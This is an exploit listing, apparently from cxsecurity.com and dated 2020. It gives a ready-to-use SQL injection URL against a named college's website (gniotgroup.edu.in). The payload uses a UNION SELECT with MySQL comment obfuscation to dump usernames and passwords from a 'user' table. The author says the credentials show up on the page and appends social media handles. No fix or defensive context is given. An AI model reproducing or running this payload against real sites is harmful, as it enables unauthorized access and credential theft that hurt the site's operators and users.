gniotgroup Sql Injection

2020.02.25
ir DMHS (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################### # Exploit Title: gniotgroup Sql Injection # # Date: 25-02-2020 # # Author: DMHS # ########################### Inject Your Code: https://www.gniotgroup.edu.in/album-inner.php?id=12-UHG ######################################## [+] Demo : https://www.gniotgroup.edu.in/album-inner.php?id=-12-UHG' /*!50000UNION*/ SELECT 1,2,3,4,5,group_concat(username,0x3a,password),7,8 /*!50000from*/ user--+ > You Can See The Username & Password in the site • https://t.me/dmhs82 • instagram: @dmhs82


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top